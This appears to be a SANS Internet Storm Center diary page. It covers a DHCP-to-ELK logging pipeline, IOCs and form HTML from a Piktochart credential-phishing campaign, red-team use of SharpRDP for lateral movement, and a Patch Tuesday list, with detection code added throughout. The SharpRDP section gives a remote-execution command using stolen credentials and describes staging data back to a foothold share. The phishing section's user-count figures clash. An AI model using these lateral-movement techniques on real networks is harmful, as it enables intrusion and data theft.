SANS Internet Storm Center - Cooperative Cyber Security Monitor
Updated: 2 hours 24 minutes ago
12 March 2021

Microsoft DHCP Logs Shipped to ELK, (Fri, Mar 12th)

This parser takes the logs from a Windows 2012R2 DHCP server (C:\Windows\System32\dhcp) and parses them into usable metadata that can be monitored via a dashboard. The fields have been mapped to ECS, in the same format as the packetbeat DHCPv4 fields [1].

→ First step is to load the Microsoft DHCP templates [3][4] via Kibana Dev Tools to create the microsoft.dhcp index template and Index Lifecycle Management (ILM) policy. Follow the instructions at the top of each template.

→ Second step is to install Logstash (if not already done) and add the Logstash filter [2] as a configuration file (i.e. /etc/logstash/conf.d/logstash-filter-dhcp.conf).

The configuration file contains a Logstash filter used to compare the OUI (first three bytes) of the client MAC address against a local list (in this configuration: oui.yml). Get the OUI list from the IEEE website and convert it into a YAML list saved in the /opt directory.

- In Linux, download the file into /opt with wget:

  • wget -O /opt/oui.txt http://standards-oui.ieee.org/oui/oui.txt

- Then run the following command to create the OUI file. It keeps only the "(base 16)" lines, rewrites each one as "OUI": Organization (the tabs and the trailing carriage return are consumed by the expression) and strips any @ characters:

  • # grep 'base 16' /opt/oui.txt | sed -e 's/^\([[:xdigit:]]\{6\}\).*(base 16)\t\t\(.*\)\r/"\1": \2/gi' | tr -d '@' > /opt/oui.yml

  Spot-check the result: grep '"00000C"' /opt/oui.yml should return the Cisco Systems entry. If the lines come out unconverted, the downloaded file does not have the CRLF line endings the expression expects; drop the \r from it. Organization names that contain a colon followed by a space, or quotes, need quoting before the file parses as YAML.

Start the Logstash service and verify under Stack Management → Index Management that an index similar to microsoft.dhcp-2021.03.12-000001 has been created.

→ Third step is to install filebeat on the Windows DHCP server, configured as a service, and change the filebeat.yml configuration to contain only the following. Change the IP address in this file to the IP address of the Logstash service:

# This filebeat shipper is used
# for Microsoft DHCP logs

# 9 Jan 2021
# Version: 1.0

filebeat.inputs:

# Filebeat input for Microsoft DHCP logs

- type: log
  paths:
    - "C:/Windows/System32/dhcp/DhcpSrvLog-*.log"
  # keep only event records (two-digit event ID followed by a comma); skips the descriptive header of each log
  include_lines: ["^[0-9]{2},"]
  # place custom fields at the top level of the event instead of under "fields."
  fields_under_root: true

#==================== Queued Event ====================
#queue.mem:
#  events: 4096
#  flush.min_events: 512
#  flush.timeout: 5s

#queue.disk:
#  path: "/op/filebeat/diskqueue"
#  max_size: 10GB

#==================== Output Event ====================
output.logstash:
  hosts: ["192.168.2.23:5044"]


At this point, the logs should start flowing to ELK. From the Windows server, verify that the connection to Logstash has been established by running at the command line: netstat -an | findstr 5044 (you should see an ESTABLISHED connection to the Logstash IP). Note that the output.logstash section above sends the logs in clear text; see [6] on securing the stack with TLS.

In Kibana, under Stack Management -> Index Management, look for a new index matching microsoft.dhcp-* (something like microsoft.dhcp-2021.03.12-000001); its document count should start growing as new data is received.

→ Last step is to load the dashboard [5]: in Kibana, under Stack Management -> Saved Objects, import the file Microsoft_DHCP_7.11_v1.ndjson. This loads the new dashboard and the index pattern.

The dashboard should have this look and feel:

The DHCP log format being parsed (one CSV record per line, fields in this order):

ID, Date, Time, Description, IP Address, Host Name, MAC Address, User Name, TransactionID, QResult, Probationtime, CorrelationID, Dhcid, VendorClass(Hex), VendorClass(ASCII), UserClass(Hex), UserClass(ASCII), RelayAgentInformation, DnsRegError

Since DHCP does not require any authentication from the client, any device on the network segment can obtain a lease. It is good housekeeping to monitor these logs and look out for strange hostnames and unknown or unidentified vendor MAC addresses (OUIs), to know what is accessing the network.
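As an added example (not part of the diary and not the Logstash filter it links), here is the same pipeline in Python: it builds the OUI lookup from an IEEE-style oui.txt excerpt, parses DhcpSrvLog records in the field order listed above, maps them to ECS-style field names, and applies the two checks the paragraph suggests (unknown OUI, odd hostname). The log lines, the hostname naming convention and the OUI excerpt are constructed for illustration; the ECS field names follow the packetbeat dhcpv4 conventions only loosely and are an assumption of this example.

```python
"""Parse Microsoft DHCP audit-log records, enrich with IEEE OUI vendors, flag odd leases (added example)."""
import csv
import re
from datetime import datetime

# Column order of DhcpSrvLog-*.log, as listed in the diary.
DHCP_FIELDS = [
    "ID", "Date", "Time", "Description", "IP Address", "Host Name", "MAC Address",
    "User Name", "TransactionID", "QResult", "Probationtime", "CorrelationID", "Dhcid",
    "VendorClass(Hex)", "VendorClass(ASCII)", "UserClass(Hex)", "UserClass(ASCII)",
    "RelayAgentInformation", "DnsRegError",
]

# Constructed excerpt in the layout of the IEEE oui.txt download (CRLF endings, as the diary's sed expects).
OUI_TXT = (
    "00-00-0C   (hex)\t\tCisco Systems, Inc\r\n"
    "00000C     (base 16)\t\tCisco Systems, Inc\r\n"
    "\t\t\t\t170 West Tasman Drive\r\n"
    "\r\n"
    "005056     (base 16)\t\tVMware, Inc.\r\n"
)

# Constructed log excerpt: the CSV header line plus four records (the last one has fewer columns on purpose).
SAMPLE_LOG = """\
ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name,TransactionID,QResult,Probationtime,CorrelationID,Dhcid,VendorClass(Hex),VendorClass(ASCII),UserClass(Hex),UserClass(ASCII),RelayAgentInformation,DnsRegError
10,03/12/21,08:15:22,Assign,192.168.2.50,LAPTOP-01.example.local,005056AB1234,,1193046,0,,,,,,,,,0
11,03/12/21,08:16:03,Renew,192.168.2.51,WKS-17,00000C123456,,1193047,0,,,,,,,,,0
10,03/12/21,08:17:45,Assign,192.168.2.77,raspberrypi,DEADBEEF0001,,1193048,0,,,,,,,,,0
24,03/12/21,09:00:00,Database Cleanup Begin,,,,
"""

BASE16_RE = re.compile(r"^([0-9A-Fa-f]{6})\s+\(base 16\)\s+(.*?)\s*$")
RECORD_RE = re.compile(r"^[0-9]{2},")   # same filter as filebeat's include_lines
HOSTNAME_POLICY = re.compile(r"^[A-Z]+-\d{2,}(\.example\.local)?$", re.I)  # assumed site naming convention


def load_oui(text):
    """Same selection as the grep/sed step: {'00000C': 'Cisco Systems, Inc', ...}."""
    table = {}
    for line in text.splitlines():
        m = BASE16_RE.match(line)
        if m:
            table[m.group(1).upper()] = m.group(2).replace("@", "")
    return table


def parse_record(line):
    """One CSV record -> dict keyed by DHCP_FIELDS; None for the header and any comment lines."""
    if not RECORD_RE.match(line):
        return None
    row = next(csv.reader([line]))
    row += [""] * (len(DHCP_FIELDS) - len(row))   # older servers write fewer columns
    return dict(zip(DHCP_FIELDS, row))


def to_ecs(rec, oui_table):
    """Map a record to ECS-style field names (names are an assumption, loosely after packetbeat's dhcpv4 fields)."""
    mac_hex = re.sub(r"[^0-9A-Fa-f]", "", rec["MAC Address"]).upper()
    try:  # the log carries server local time with no zone; kept as a naive ISO timestamp
        ts = datetime.strptime(f"{rec['Date']} {rec['Time']}", "%m/%d/%y %H:%M:%S").isoformat()
    except ValueError:
        ts = None
    return {
        "@timestamp": ts,
        "event.code": rec["ID"],
        "event.action": rec["Description"],
        "client.ip": rec["IP Address"],
        "client.mac": "-".join(mac_hex[i:i + 2] for i in range(0, len(mac_hex), 2)),
        "client.user.name": rec["User Name"],
        "host.name": rec["Host Name"],
        "client.vendor": oui_table.get(mac_hex[:6], "UNKNOWN") if mac_hex else "",
    }


def review(event, policy=HOSTNAME_POLICY):
    """Reasons a lease deserves a look: unknown OUI, missing hostname, hostname outside the convention."""
    if not event["client.mac"]:   # server-side events (cleanup, DNS updates) carry no client MAC
        return []
    reasons = []
    if event["client.vendor"] == "UNKNOWN":
        reasons.append("unregistered or unknown OUI")
    if not event["host.name"]:
        reasons.append("no hostname offered")
    elif not policy.match(event["host.name"]):
        reasons.append("hostname outside naming convention")
    return reasons


def process(log_text, oui_text=OUI_TXT):
    """Full pipeline: returns (events, alerts); alerts are (client.ip, host.name, reasons) tuples."""
    oui = load_oui(oui_text)
    events, alerts = [], []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        ev = to_ecs(rec, oui)
        events.append(ev)
        reasons = review(ev)
        if reasons:
            alerts.append((ev["client.ip"], ev["host.name"], reasons))
    return events, alerts
```

Running process(SAMPLE_LOG) yields four events and one alert: the lease for 192.168.2.77, whose OUI (DEADBE) is not in the list and whose hostname does not follow the assumed convention. The cleanup record (ID 24) has no MAC and is never flagged; records missing trailing columns are padded rather than dropped, which is the behaviour you want from the Logstash csv filter as well.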


[1] https://www.elastic.co/guide/en/beats/packetbeat/master/exported-fields-dhcpv4.html
[2] https://handlers.sans.edu/gbruneau/elk/logstash-filter-dhcp.conf
[3] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_ilm_policy.txt
[4] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_template.txt
[5] https://handlers.sans.edu/gbruneau/elk/Microsoft_DHCP_7.11_v1.ndjson
[6] https://isc.sans.edu/forums/diary/Secure+Communication+using+TLS+in+Elasticsearch/26902/
[7] https://www.elastic.co/guide/en/ecs/1.8/ecs-field-reference.html
[8] https://handlers.sans.edu/gbruneau/elastic.htm

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
12 March 2021

ISC Stormcast For Friday, March 12th, 2021 https://isc.sans.edu/podcastdetail.html?id=7410, (Fri, Mar 12th)

11 March 2021

Piktochart - Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]


In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail [1] and pretending to be an Outlook version update [2], we've recently learned of a phishing campaign targeting users of the infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools. This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool, like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

According to its website, Piktochart has about 2,000 registered users and about 24 million Piktocharts created, and is used by companies such as Forbes, TechCrunch and others. With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing: their registered "Pro users" can download an actual .pdf file with the malicious link intact, or render the file into several different sizes of .png image, as shown in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew, whose account had already been compromised. If they click the link, a 2nd stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org. This base domain currently has "0 out of 87" vendors reporting it as malicious on VirusTotal, and is made out to be a non-profit in Lagos, Nigeria. This specific example had a different site registration than most of the other, identical sites I've researched, so it is possible this site was the result of a takeover of a legitimate business's WordPress website, or a redirection of the site's DNS.


Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft O365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites. There are quite a few domains on the same IP [5], for example:

pwan-heritage(.)com/pol/OfficeV4/*
secure-official-spotify.pwanplus(.)com
www.dhl-delivery-failure-resolve.naijamail(.)com - this one includes a nice-looking DHL form [6]


Indicators of compromise - IOCs  

URLS/Domains
create.piktochart.com/output/52653368-my-visual
piktochart.com (if not needed for business)

2nd stage/stealer
obggladdenlightfoundation.org/dfsmith/ofc3
obggladdenlightfoundation.org/dfsmith/ofc3/
obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf6668
obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf666

IP
173.231.197.145 [7]
Hostname:    ded5495.inmotionhosting.com

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microsoft cred-stealer image - hashes (SHA-2)
7, 10, and 3 kB versions of the same image
a90370dc587b73cd2dbe33504794e83c83dc9f365cd9cd94511593046db5ae09
bc2afe6e49541902541497a6823e1aa0f8e8683e203d4da6bc75590bddebeb702bed6013d59910f6714448cafeda98708886d48978b6b991627526964379efc0

DOM (cred-stealer page)
<form id="1MDAwMDMxMjAyMS0wMy0wMjE2MTQ2NTgwMDQ4NTgxMTAx"> <input type="hidden" value="[removed]"><input type="hidden" value="[removed]"> </form>

POST request (the form that collects the credentials)
<form id="f2" method="post" action="#" style="margin-bottom: 0px;"> <input required="" type="email" placeholder="Email, phone, or Skype" name="e" style="outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;"> <img src="data:image/png;base64"...

Cookies (both shown with a 1969-12-31 23:59:59 expiry, i.e. no expiry set)
obggladdenlightfoundation.org/                Name: PHPSESSID
obggladdenlightfoundation.org/dfsmith/ofc3/s  Name: ip11
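As an added example (not part of the diary), a small hunt that runs the IOCs above against proxy-log lines: it matches the Piktochart lure URL, the stealer domains and the shared hosting IP, treats a POST to the stealer kit path as a likely credential submission, and inspects the signin parameter. The log lines and the internal client addresses are constructed. One detail worth knowing when you see these URLs: d41d8cd98f00b204e9800998ecf8427e is the MD5 of an empty string, so the signin value carries no per-victim information.

```python
"""Run the diary's Piktochart / credential-stealer IOCs over proxy logs (added example; log lines constructed)."""
import hashlib
from urllib.parse import urlparse, parse_qs

# IOCs from the diary, with the (.) defanging removed.
LURE_URLS = {"create.piktochart.com/output/52653368-my-visual"}
STEALER_DOMAINS = {
    "obggladdenlightfoundation.org",
    "pwan-heritage.com",
    "secure-official-spotify.pwanplus.com",
    "www.dhl-delivery-failure-resolve.naijamail.com",
}
STEALER_IP = "173.231.197.145"
STEALER_PATH_PREFIX = "/dfsmith/ofc3"

# Constructed proxy log: "<timestamp> <client> <dest-ip> <method> <url> <status>" (hypothetical clients)
SAMPLE_PROXY_LOG = """\
2021-03-10T14:02:11Z 10.1.5.23 198.51.100.10 GET https://create.piktochart.com/output/52653368-my-visual 200
2021-03-10T14:02:40Z 10.1.5.23 173.231.197.145 GET https://obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2ee 200
2021-03-10T14:03:02Z 10.1.5.23 173.231.197.145 POST https://obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2ee 302
2021-03-10T14:05:00Z 10.1.7.8 203.0.113.5 GET https://www.example.com/ 200
"""


def is_empty_md5(value):
    """True when value is MD5(""), the constant the stealer sends as signin=."""
    return value.lower() == hashlib.md5(b"").hexdigest()


def classify(dest_ip, method, url):
    """Tags for one request; an empty list means nothing on the IOC list is involved."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    tags = []
    if host + parsed.path in LURE_URLS:
        tags.append("piktochart-lure")
    if host in STEALER_DOMAINS or dest_ip == STEALER_IP:
        tags.append("stealer-infrastructure")
        if parsed.path.startswith(STEALER_PATH_PREFIX):
            tags.append("stealer-kit-path")
            signin = parse_qs(parsed.query).get("signin", [""])[0]
            if is_empty_md5(signin):
                tags.append("signin=md5('')")
        if method == "POST":
            tags.append("credentials-likely-submitted")
    return tags


def hunt(log_text):
    """Group IOC hits per internal client: {client: [(timestamp, tags), ...]}."""
    hits = {}
    for line in log_text.splitlines():
        ts, client, dest_ip, method, url, _status = line.split()
        tags = classify(dest_ip, method, url)
        if tags:
            hits.setdefault(client, []).append((ts, tags))
    return hits
```

For the constructed log, hunt() returns a single client, 10.1.5.23, with the lure fetch followed by two requests to the stealer kit, the second of them a POST; that sequence is the trigger for a password reset and a look at the mailbox rules of the account involved.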


 JB Bowers
@cherokeejb_

References:
[1] - https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110
[2] - https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
[3] - https://apageinsec.wordpress.com/
[4] - https://create.piktochart.com/output/52653368-my-visual
[5] - https://urlscan.io/result/e02ea839-9671-4d31-a039-effd54877c0b/related/
[6] - https://urlscan.io/screenshots/205111b7-b981-48e9-9359-df55f278163b.png
[7] - https://isc.sans.edu/ipinfo.html?ip=173.231.197.145

 

11 March 2021

ISC Stormcast For Thursday, March 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7408, (Thu, Mar 11th)

10 March 2021

If you have an F5, it's time to patch! Thanks Michele for the link to today's crop of F5 CVEs, which include an unauthenticated RCE against the API, and another RCE against "hidden" config pages! https://support.f5.com/csp/article...

=============== Rob VandenBrink coherentsecurity.com

10 March 2021

SharpRDP - PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of detection coverage organizations have these days for malicious PowerShell execution or the use of tools like psexec, red teams have to be asking themselves: what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn't an option, SharpRDP makes a pretty easy "next tool on the shelf".

RDP, much like the Citrix ICA protocol Microsoft borrowed from when Terminal Services was built, is not just a screen-sharing protocol: it multiplexes "channels" that carry all sorts of things besides the interactive session. In ICA, the most common use of channels was to separate printer traffic from interactive traffic and apply different QoS policies to each. SharpRDP takes this further: it drives the Microsoft RDP client control (mstscax) from a .NET program, starts a session with the supplied credentials and, once the session is up, sends the keystrokes needed to execute a command on the remote host (the mechanics are in the SpecterOps write-up linked at the end).

For the red team, this has oodles of attraction - often you don't have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally "GUI" protocol. Since it's in an RDP session, it's an actual interactive desktop session (not just a shell), so all of your inputs and outputs are handled correctly. While you could theoretically run a CLI terminal session over this, I'm not sure that this is implemented - I haven't needed to figure that piece out yet if it is.

For someone on the blue team, this is a tough thing to catch - on the target it is a normal interactive RDP logon (Security event 4624, logon type 10), just like any other RDP session your admins might make, that happens to execute "something" right after it starts.

What does a session look like?  It's as simple as:

>SharpRDP.exe computername=targetservername command="<some command>" username=<domain>\<userid> password=<password string>
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing <some command>
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I'll have the "command" be a CMD file that does whatever I'm trying to accomplish - usually it's data collection of some kind, with the data coming back to the host that I have my foothold on. Remember that if your command is not an actual executable (for instance, "dir" is not an executable file, it's a built-in of cmd.exe), you will have to use "c:\windows\system32\cmd.exe /c <command>" to load the cmd interpreter prior to executing your "thing".

My go-to is single-letter CMD files, so for instance t.cmd. This file is usually homed on my foothold server, and sends the data back to a share on that same server. Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (and not have name collisions).

Protections?  LAPS is a good one - if every target host has a different password, you'll have to collect all of that first before you can use SharpRDP.  (https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/).  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn't too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I've got a few clients running this, and it's pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it's a "click OK" or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you've got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and the detection you can code into your SIEM is whatever event your MFA product generates for "failed MFA on RDP". Your protection for the MFA system itself is "alert on any new registration of MFA users". You'll want any registration of new users, or of new phones for existing users, to go to a number of people - once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021 - there are a lot of people working on fixing this though.  The uptick in migrating VPN's and Citrix Gateways to newer MFA solutions means that it's becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.
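As an added example (not from the diary and not SharpRDP's code), detection logic for the pattern the session output above shows: an RDP logon (Security event 4624, logon type 10) followed within seconds by a process creation under the same logon ID (4688, whose SubjectLogonId equals the 4624 TargetLogonId) and then a logoff (4647 or 4634) shortly after. Interactive admins do not normally log on, run one thing and leave within a minute. The records below are constructed from the EventData fields of those events; the thresholds, host names and accounts are assumptions, and 4688 with command lines requires process-creation auditing to be enabled.

```python
"""Flag RDP sessions that log on, launch a process and log off within a short window (added example)."""
from datetime import datetime

RDP_LOGON_TYPE = "10"        # RemoteInteractive
MAX_FIRST_PROCESS_S = 30     # assumed: seconds from logon to first process creation
MAX_SESSION_S = 120          # assumed: a session this short with activity looks scripted

# Constructed Security-log records (subset of the 4624 / 4688 / 4647 EventData fields).
SAMPLE_EVENTS = [
    # scripted-looking session: logon, one cmd.exe, logoff, all within nine seconds
    {"id": 4624, "time": "2021-03-10T13:00:00", "TargetLogonId": "0x3e7f21", "LogonType": "10",
     "TargetUserName": "svc-backup", "IpAddress": "10.0.0.5"},
    {"id": 4688, "time": "2021-03-10T13:00:04", "SubjectLogonId": "0x3e7f21",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c \\\\foothold\\share\\t.cmd"},
    {"id": 4647, "time": "2021-03-10T13:00:09", "TargetLogonId": "0x3e7f21"},
    # ordinary admin session: logon, some work over an hour, logoff
    {"id": 4624, "time": "2021-03-10T09:00:00", "TargetLogonId": "0x1a2b3c", "LogonType": "10",
     "TargetUserName": "admin1", "IpAddress": "10.0.0.9"},
    {"id": 4688, "time": "2021-03-10T09:04:30", "SubjectLogonId": "0x1a2b3c",
     "NewProcessName": "C:\\Windows\\System32\\mmc.exe", "CommandLine": "mmc.exe"},
    {"id": 4647, "time": "2021-03-10T10:15:00", "TargetLogonId": "0x1a2b3c"},
    # network logon (type 3): not RDP, ignored
    {"id": 4624, "time": "2021-03-10T13:30:00", "TargetLogonId": "0x55aa", "LogonType": "3",
     "TargetUserName": "svc-backup", "IpAddress": "10.0.0.5"},
]


def _t(s):
    return datetime.fromisoformat(s)


def build_sessions(events):
    """Stitch events into RDP sessions keyed by logon ID: logon record, process list, logoff time."""
    sessions = {}
    for ev in sorted(events, key=lambda e: e["time"]):   # ISO timestamps sort lexically
        if ev["id"] == 4624 and ev["LogonType"] == RDP_LOGON_TYPE:
            sessions[ev["TargetLogonId"]] = {"logon": ev, "processes": [], "logoff": None}
        elif ev["id"] == 4688 and ev["SubjectLogonId"] in sessions:
            sessions[ev["SubjectLogonId"]]["processes"].append(ev)
        elif ev["id"] in (4634, 4647) and ev["TargetLogonId"] in sessions:
            sessions[ev["TargetLogonId"]]["logoff"] = ev["time"]
    return sessions


def find_scripted_rdp(events, max_first_s=MAX_FIRST_PROCESS_S, max_session_s=MAX_SESSION_S):
    """Sessions whose first process started quickly and which ended quickly: SharpRDP-like use."""
    findings = []
    for logon_id, s in build_sessions(events).items():
        if not s["processes"] or s["logoff"] is None:
            continue
        start = _t(s["logon"]["time"])
        first_proc = (_t(s["processes"][0]["time"]) - start).total_seconds()
        length = (_t(s["logoff"]) - start).total_seconds()
        if first_proc <= max_first_s and length <= max_session_s:
            findings.append({
                "logon_id": logon_id,
                "user": s["logon"]["TargetUserName"],
                "source_ip": s["logon"]["IpAddress"],
                "session_seconds": length,
                "command_lines": [p["CommandLine"] for p in s["processes"]],
            })
    return findings
```

On the constructed data only the nine-second svc-backup session is returned, with its command line pointing at a CMD file on a remote share, exactly the shape of use described above. Tune the two thresholds to your environment: SharpRDP's command runs after the desktop has loaded, so on a slow host the first 4688 may arrive later than a few seconds.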

SharpRDP is homed here:
https://github.com/0xthirteen/SharpRDP
And has a full write-up here:
https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3

 

===============
Rob VandenBrink
rob@coherentsecurity.com

10 March 2021

ISC Stormcast For Wednesday, March 10th, 2021 https://isc.sans.edu/podcastdetail.html?id=7406, (Wed, Mar 10th)

9 March 2021

Microsoft March 2021 Patch Tuesday, (Tue, Mar 9th)

This month we got patches for 122 vulnerabilities. Of these, 14 are critical, 5 are being exploited and 2 were previously disclosed. 

The highlight for this month goes to the Microsoft Exchange Server vulnerabilities that are being exploited and for which Microsoft made emergency patches available on March 2. If you have this software in your environment, especially if the service is exposed to the internet, and have not applied the patches yet, then in addition to applying them it is imperative that you check whether your system may already have been compromised. Johannes published a diary summarizing the vulnerabilities and giving advice on how to check for evidence of compromise.

In addition to the 4 Microsoft Exchange Server vulnerabilities, there is a fifth vulnerability being exploited which had been previously disclosed. This is an RCE affecting Microsoft Edge and Internet Explorer 11 (CVE-2021-26411) on multiple Windows versions. According to the advisory, to exploit this vulnerability an attacker would have to convince a user to visit a malicious website, as in a phishing scenario. The exploit is publicly disclosed, and exploitation has already been detected.

The highest CVSS score this month (9.90) was given to the Windows Hyper-V Remote Code Execution Vulnerability (CVE-2021-26867). The vulnerability advisory says that any Hyper-V client which is configured to use the Plan 9 file system could be vulnerable. An authenticated attacker who successfully exploited this vulnerability on a Hyper-V client could cause code to execute on the Hyper-V server.

And for the second month in a row, there is a critical RCE vulnerability affecting Windows DNS Server (CVE-2021-26897) with a CVSS of 9.80. According to the advisory, the vulnerability affects any DNS Server, whether a standalone DNS primary authoritative server or a DNS Server integrated with Active Directory. It also states that to be vulnerable, a DNS server needs to have dynamic updates enabled.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (avg) | CVSS Temporal (avg)
Application Virtualization Remote Code Execution Vulnerability | CVE-2021-26890 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Azure Sphere Unsigned Code Execution Vulnerability | CVE-2021-27074 | No | No | Less Likely | Less Likely | Critical | 6.2 | 5.6
Azure Sphere Unsigned Code Execution Vulnerability | CVE-2021-27080 | No | No | Less Likely | Less Likely | Critical | 9.3 | 9.3
Azure Virtual Machine Information Disclosure Vulnerability | CVE-2021-27075 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1
Chromium: Heap buffer overflow in OpenJPEG | CVE-2020-27844 | No | No | - | - | - | | 
Chromium: Heap buffer overflow in TabStrip | CVE-2021-21159 | No | No | - | - | - | | 
Chromium: Heap buffer overflow in WebAudio | CVE-2021-21160 | No | No | - | - | - | | 
Chromium: Heap buffer overflow in TabStrip | CVE-2021-21161 | No | No | - | - | - | | 
Chromium: Use after free in WebRTC | CVE-2021-21162 | No | No | - | - | - | | 
Chromium: Insufficient data validation in Reader Mode | CVE-2021-21163 | No | No | - | - | - | | 
Chromium: Insufficient data validation in Chrome for iOS | CVE-2021-21164 | No | No | - | - | - | | 
Chromium: Object lifecycle issue in audio | CVE-2021-21165 | No | No | - | - | - | | 
Chromium: Object lifecycle issue in audio | CVE-2021-21166 | No | No | - | - | - | | 
Chromium: Use after free in bookmarks | CVE-2021-21167 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in appcache | CVE-2021-21168 | No | No | - | - | - | | 
Chromium: Out of bounds memory access in V8 | CVE-2021-21169 | No | No | - | - | - | | 
Chromium: Incorrect security UI in Loader | CVE-2021-21170 | No | No | - | - | - | | 
Chromium: Incorrect security UI in TabStrip and Navigation | CVE-2021-21171 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in File System API | CVE-2021-21172 | No | No | - | - | - | | 
Chromium: Side-channel information leakage in Network Internals | CVE-2021-21173 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in Referrer | CVE-2021-21174 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in Site isolation | CVE-2021-21175 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in full screen mode | CVE-2021-21176 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in Autofill | CVE-2021-21177 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in Compositing | CVE-2021-21178 | No | No | - | - | - | | 
Chromium: Use after free in Network Internals | CVE-2021-21179 | No | No | - | - | - | | 
Chromium: Use after free in tab search | CVE-2021-21180 | No | No | - | - | - | | 
Chromium: Side-channel information leakage in autofill | CVE-2021-21181 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in navigations | CVE-2021-21182 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in performance APIs | CVE-2021-21183 | No | No | - | - | - | | 
Chromium: Inappropriate implementation in performance APIs | CVE-2021-21184 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in extensions | CVE-2021-21185 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in QR scanning | CVE-2021-21186 | No | No | - | - | - | | 
Chromium: Insufficient data validation in URL formatting | CVE-2021-21187 | No | No | - | - | - | | 
Chromium: Use after free in Blink | CVE-2021-21188 | No | No | - | - | - | | 
Chromium: Insufficient policy enforcement in payments | CVE-2021-21189 | No | No | - | - | - | | 
Chromium: Uninitialized Use in PDFium | CVE-2021-21190 | No | No | - | - | - | | 
DirectX Elevation of Privilege Vulnerability | CVE-2021-24095 | No | No | More Likely | More Likely | Important | 7.0 | 6.1
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2021-21300 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-24089 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-24110 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-26902 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27047 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27048 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27049 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
